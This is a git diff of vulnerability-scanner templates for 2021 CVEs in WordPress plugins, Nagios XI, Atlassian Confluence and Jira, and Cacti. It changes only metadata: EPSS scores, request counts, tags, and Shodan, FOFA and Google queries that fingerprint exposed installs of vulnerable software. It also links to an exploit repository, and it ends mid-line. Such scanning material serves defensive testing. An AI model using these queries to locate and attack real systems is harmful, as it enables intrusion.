http://packetstormsecurity.com/files/163382/WordPress-Backup-Guard-1.5.8-Shell-Upload.html + - https://github.com/0dayNinja/CVE-2021-24155.rb classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24155 cwe-id: CWE-434 - epss-score: 0.95488 - epss-percentile: 0.99234 + epss-score: 0.96281 + epss-percentile: 0.99534 cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index f4dfbc1a06..a39285a954 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -29,9 +29,9 @@ info: vendor: ninjaforms product: ninja_forms framework: wordpress - publicwww-query: /wp-content/plugins/ninja-forms/ shodan-query: http.html:/wp-content/plugins/ninja-forms/ fofa-query: body=/wp-content/plugins/ninja-forms/ + publicwww-query: /wp-content/plugins/ninja-forms/ tags: cve2021,cve,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms http: diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index 3c4d2c3e07..d9df5c85cd 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2021-24176 cwe-id: CWE-79 - epss-score: 0.00136 - epss-percentile: 0.48949 + epss-score: 0.00186 + epss-percentile: 0.55717 cpe: cpe:2.3:a:jh_404_logger_project:jh_404_logger:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 04a74913bc..7cb5374bc0 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -25,9 +25,9 @@ info: cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: daggerhartlab - product: openid_connect_generic_client + product: "openid_connect_generic_client" framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml index 6d571939e6..8c8b87d6b4 100644 --- a/http/cves/2021/CVE-2021-24215.yaml +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -27,9 +27,9 @@ info: vendor: wpruby product: controlled_admin_access framework: wordpress - publicwww-query: /wp-content/plugins/controlled-admin-access/ shodan-query: http.html:/wp-content/plugins/controlled-admin-access/ fofa-query: body=/wp-content/plugins/controlled-admin-access/ + publicwww-query: /wp-content/plugins/controlled-admin-access/ tags: cve2021,cve,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access,wpruby http: diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index 0c2abeb26f..b533c5a11d 100644 --- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24226 cwe-id: CWE-200 epss-score: 0.03058 - epss-percentile: 0.90773 + epss-percentile: 0.90986 cpe: cpe:2.3:a:accessally:accessally:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index 2cb93cb77a..330d2df197 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -23,9 +23,9 @@ info: cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: genetechsolutions - product: pie_register + product: "pie_register" framework: wordpress tags: cve2021,cve,xss,pie-register,wp,wpscan,genetechsolutions,wordpress flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index d2c93c402b..74ea297e4d 100644 --- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -24,12 +24,11 @@ info: epss-percentile: 0.60494 cpe: cpe:2.3:a:trumani:stop_spammers:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: trumani - product: stop_spammers + product: "stop_spammers" framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,packetstorm,trumani - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index c3274e5f2b..f8e7a46e4e 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -21,16 +21,16 @@ info: cve-id: CVE-2021-24275 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.60494 + epss-percentile: 0.61154 cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: supsystic product: popup framework: wordpress - publicwww-query: /wp-content/plugins/popup-by-supsystic shodan-query: http.html:/wp-content/plugins/popup-by-supsystic fofa-query: body=/wp-content/plugins/popup-by-supsystic + publicwww-query: /wp-content/plugins/popup-by-supsystic tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,supsystic http: diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 0bd7919fd2..aaef829355 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -28,9 +28,9 @@ info: vendor: supsystic product: contact_form framework: wordpress - publicwww-query: /wp-content/plugins/contact-form-plugin/ shodan-query: http.html:/wp-content/plugins/contact-form-plugin/ fofa-query: body=/wp-content/plugins/contact-form-plugin/ + publicwww-query: /wp-content/plugins/contact-form-plugin/ tags: cve2021,cve,wordpress,wp-plugin,wpscan,packetstorm,supsystic http: diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml index f89c216090..afe318f210 100644 --- a/http/cves/2021/CVE-2021-24284.yaml +++ b/http/cves/2021/CVE-2021-24284.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24284 cwe-id: CWE-434 - epss-score: 0.96657 - epss-percentile: 0.99614 + epss-score: 0.96712 + epss-percentile: 0.99652 cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 @@ -31,7 +31,6 @@ info: product: kaswara framework: wordpress tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project - variables: zip_file: "{{to_lower(rand_text_alpha(6))}}" php_file: "{{to_lower(rand_text_alpha(2))}}.php" diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 9cfe43d4db..02ebb005ba 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -27,9 +27,9 @@ info: vendor: 10web product: photo_gallery framework: wordpress - publicwww-query: /wp-content/plugins/photo-gallery shodan-query: http.html:/wp-content/plugins/photo-gallery fofa-query: body=/wp-content/plugins/photo-gallery + publicwww-query: /wp-content/plugins/photo-gallery tags: cve2021,cve,photo,wpscan,packetstorm,xss,wordpress,wp-plugin,10web http: diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index 6b404a1450..f1d11e905d 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -25,12 +25,11 @@ info: epss-percentile: 0.45761 cpe: cpe:2.3:a:ibenic:simple_giveaways:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: ibenic - product: simple_giveaways + product: "simple_giveaways" framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,ibenic - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 6b4aa6e017..12b553a08d 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -24,8 +24,8 @@ info: epss-percentile: 0.46682 cpe: cpe:2.3:a:bold-themes:bello:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: bold-themes + max-request: 3 + vendor: "bold-themes" product: bello framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,bold-themes diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index 7fb2a3b0f2..7e0481e720 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -24,12 +24,11 @@ info: epss-percentile: 0.54412 cpe: cpe:2.3:a:smartdatasoft:car_repair_services_\&_auto_mechanic:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: smartdatasoft - product: car_repair_services_\&_auto_mechanic + product: "car_repair_services_\\&_auto_mechanic" framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,smartdatasoft - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 465c664191..46d9da3c92 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -26,10 +26,10 @@ info: vendor: veronalabs product: wp_statistics framework: wordpress - google-query: inurl:/wp-content/plugins/wp-statistics - publicwww-query: /wp-content/plugins/wp-statistics/ shodan-query: http.html:/wp-content/plugins/wp-statistics/ fofa-query: body=/wp-content/plugins/wp-statistics/ + publicwww-query: /wp-content/plugins/wp-statistics/ + google-query: inurl:/wp-content/plugins/wp-statistics tags: cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs http: diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index 1bef78b439..94806a58d2 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -23,12 +23,11 @@ info: epss-percentile: 0.43845 cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: jnews product: jnews framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,jnews - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index be784166b6..2f0647816b 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -24,12 +24,11 @@ info: epss-percentile: 0.43845 cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: tielabs product: jannah framework: wordpress tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index 08e7ae5460..f3e050b2da 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-24387 cwe-id: CWE-79 epss-score: 0.00154 - epss-percentile: 0.50743 + epss-percentile: 0.51646 cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index ebcb45d7dd..7835c492da 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -23,12 +23,11 @@ info: epss-percentile: 0.58055 cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: tielabs product: jannah framework: wordpress tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index 01c948f9f1..30b6e323b1 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -26,9 +26,9 @@ info: vendor: plugin-planet product: prismatic framework: wordpress - publicwww-query: "/wp-content/plugins/prismatic" shodan-query: http.html:/wp-content/plugins/prismatic fofa-query: body=/wp-content/plugins/prismatic + publicwww-query: "/wp-content/plugins/prismatic" tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet http: diff --git a/http/cves/2021/CVE-2021-24442.yaml b/http/cves/2021/CVE-2021-24442.yaml index ef5943bbeb..5bb7e4cdda 100644 --- a/http/cves/2021/CVE-2021-24442.yaml +++ b/http/cves/2021/CVE-2021-24442.yaml @@ -25,10 +25,10 @@ info: vendor: wpdevart product: poll\,_survey\,_questionnaire_and_voting_system framework: wordpress - publicwww-query: "/wp-content/plugins/polls-widget/" shodan-query: http.html:/wp-content/plugins/polls-widget/ fofa-query: body=/wp-content/plugins/polls-widget/ - tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli + publicwww-query: "/wp-content/plugins/polls-widget/" + tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart http: - raw: diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 1f57b5be55..07062bfc71 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24472 cwe-id: CWE-918 - epss-score: 0.04362 - epss-percentile: 0.92159 + epss-score: 0.03231 + epss-percentile: 0.91221 cpe: cpe:2.3:a:qantumthemes:kentharadio:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,9 +29,9 @@ info: vendor: qantumthemes product: kentharadio framework: wordpress - publicwww-query: "/wp-content/plugins/qt-kentharadio" shodan-query: http.html:/wp-content/plugins/qt-kentharadio fofa-query: body=/wp-content/plugins/qt-kentharadio + publicwww-query: "/wp-content/plugins/qt-kentharadio" tags: cve2021,cve,wordpress,lfi,ssrf,wp,wp-plugin,wpscan,qantumthemes http: diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml index ccd8d8b750..2d534bc76e 100644 --- a/http/cves/2021/CVE-2021-24627.yaml +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -25,9 +25,9 @@ info: vendor: g_auto-hyperlink_project product: g_auto-hyperlink framework: wordpress - publicwww-query: /wp-content/plugins/g-auto-hyperlink/ shodan-query: http.html:/wp-content/plugins/g-auto-hyperlink/ fofa-query: body=/wp-content/plugins/g-auto-hyperlink/ + publicwww-query: /wp-content/plugins/g-auto-hyperlink/ tags: cve2021,cve,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project variables: num: 999999999 diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index b5fcefc9e4..c1c1d4401a 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -15,13 +15,14 @@ info: - https://wordpress.org/plugins/asgaros-forum/ - https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum - https://nvd.nist.gov/vuln/detail/CVE-2021-24827 + - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24827 cwe-id: CWE-89 - epss-score: 0.11843 - epss-percentile: 0.94798 + epss-score: 0.20659 + epss-percentile: 0.96374 cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index 0909a4c438..f6f47c2c33 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -25,10 +25,10 @@ info: vendor: wclovers product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible framework: wordpress - publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace - tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli + publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" + tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index 5fa848cbeb..41fed7d518 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.45236 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 + max-request: 3 vendor: elementor - product: website_builder + product: "website_builder" framework: wordpress tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml index eca520dafd..21af45d464 100644 --- a/http/cves/2021/CVE-2021-24915.yaml +++ b/http/cves/2021/CVE-2021-24915.yaml @@ -25,9 +25,9 @@ info: vendor: contest_gallery product: contest_gallery framework: wordpress - publicwww-query: "/wp-content/plugins/contest-gallery/" shodan-query: http.html:/wp-content/plugins/contest-gallery/ fofa-query: body=/wp-content/plugins/contest-gallery/ + publicwww-query: "/wp-content/plugins/contest-gallery/" tags: cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli http: diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index 064d8e7665..a2a24f1ae2 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -25,10 +25,10 @@ info: vendor: roundupwp product: registrations_for_the_events_calendar framework: wordpress - publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/" shodan-query: http.html:/wp-content/plugins/registrations-for-the-events-calendar/ fofa-query: body=/wp-content/plugins/registrations-for-the-events-calendar/ - tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar + publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/" + tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp variables: text: "{{rand_base(5)}}" diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml index d2de46388d..862ef67636 100644 --- a/http/cves/2021/CVE-2021-24979.yaml +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -25,9 +25,9 @@ info: vendor: strangerstudios product: paid_memberships_pro framework: wordpress - publicwww-query: /wp-content/plugins/paid-memberships-pro/ shodan-query: http.html:/wp-content/plugins/paid-memberships-pro/ fofa-query: body=/wp-content/plugins/paid-memberships-pro/ + publicwww-query: /wp-content/plugins/paid-memberships-pro/ google-query: inurl:"/wp-content/plugins/paid-memberships-pro" tags: cve2021,cve,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index 5a9b19a264..18d189136f 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24997 cwe-id: CWE-862 epss-score: 0.0019 - epss-percentile: 0.55517 + epss-percentile: 0.56317 cpe: cpe:2.3:a:wp-guppy:wp_guppy:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index 075bcfb9cd..2a760c7a44 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25016 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,9 +25,9 @@ info: vendor: premio product: chaty framework: wordpress - publicwww-query: "/wp-content/plugins/chaty/" shodan-query: http.html:/wp-content/plugins/chaty/ fofa-query: body=/wp-content/plugins/chaty/ + publicwww-query: "/wp-content/plugins/chaty/" tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio http: diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index 6e37a3df8e..eb1f17b011 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25055 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 6147e1b998..eab573e463 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -26,9 +26,9 @@ info: vendor: smashballoon product: smash_balloon_social_post_feed framework: wordpress - publicwww-query: "/wp-content/plugins/custom-facebook-feed/" shodan-query: http.html:/wp-content/plugins/custom-facebook-feed/ fofa-query: body=/wp-content/plugins/custom-facebook-feed/ + publicwww-query: "/wp-content/plugins/custom-facebook-feed/" tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon http: diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index 726e7dd13e..aaa35575d3 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25074 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index 82dd73ca3c..bc9d924dcc 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -30,10 +30,10 @@ info: vendor: strangerstudios product: paid_memberships_pro framework: wordpress - google-query: inurl:"/wp-content/plugins/paid-memberships-pro" - publicwww-query: /wp-content/plugins/paid-memberships-pro/ shodan-query: http.html:/wp-content/plugins/paid-memberships-pro/ fofa-query: body=/wp-content/plugins/paid-memberships-pro/ + publicwww-query: /wp-content/plugins/paid-memberships-pro/ + google-query: inurl:"/wp-content/plugins/paid-memberships-pro" tags: cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios http: diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index 8a0c984469..d9836f7442 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -29,8 +29,12 @@ info: max-request: 4 vendor: nagios product: nagios_xi - shodan-query: title:"Nagios XI" - fofa-query: title="nagios xi" + shodan-query: + - title:"Nagios XI" + - http.title:"nagios xi" + fofa-query: + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index 1171afbe2b..9436ad3701 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -29,8 +29,12 @@ info: max-request: 4 vendor: nagios product: nagios_xi - shodan-query: title:"Nagios XI" - fofa-query: title="nagios xi" + shodan-query: + - title:"Nagios XI" + - http.title:"nagios xi" + fofa-query: + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 301f11c503..6ef6c2d41f 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -29,8 +29,12 @@ info: max-request: 4 vendor: nagios product: nagios_xi - shodan-query: title:"Nagios XI" - fofa-query: title="nagios xi" + shodan-query: + - title:"Nagios XI" + - http.title:"nagios xi" + fofa-query: + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve2021,cve,packetstorm,oast,authenticated,msf,nagiosxi,rce,kev,nagios diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index 62fbab1f27..084f103c09 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -27,8 +27,12 @@ info: max-request: 3 vendor: nagios product: nagios_xi - shodan-query: title:"Nagios XI" - fofa-query: title="nagios xi" + shodan-query: + - title:"Nagios XI" + - http.title:"nagios xi" + fofa-query: + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve2021,cve,nagios,nagiosxi,xss,authenticated diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index 6581315c5b..84725781d2 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -27,7 +27,9 @@ info: vendor: dgtl product: huemagic framework: node.js - shodan-query: title:"NODE-RED" + shodan-query: + - title:"NODE-RED" + - http.title:"node-red" fofa-query: title="node-red" google-query: intitle:"node-red" tags: cve2021,cve,huemagic,lfi,dgtl,node.js diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index cdfecc4579..2f7efb86b4 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -20,14 +20,16 @@ info: cvss-score: 7.5 cve-id: CVE-2021-25899 cwe-id: CWE-89 - epss-score: 0.50721 - epss-percentile: 0.9747 + epss-score: 0.51506 + epss-percentile: 0.9756 cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: void product: aurall_rec_monitor - shodan-query: html:"AURALL" + shodan-query: + - html:"AURALL" + - http.html:"aurall" fofa-query: body="aurall" tags: cve2021,cve,sqli,void,aurall diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index d498bdb3d7..4e07f9cebb 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -27,7 +27,9 @@ info: max-request: 13 vendor: atlassian product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" tags: cve2021,cve,rce,confluence,injection,ognl,kev,atlassian diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index c391252e5f..b78d093874 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: atlassian product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index bfc3013b37..3a73648a29 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: atlassian product: jira_data_center - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve2021,cve,lfi,packetstorm,jira,intrusive,atlassian http: diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index 4b06d65837..f871104a01 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -26,9 +26,17 @@ info: max-request: 1 vendor: cacti product: cacti - fofa-query: icon_hash="-1797138069" - shodan-query: http.title:"login to cacti" - google-query: intitle:"cacti" + shodan-query: + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to 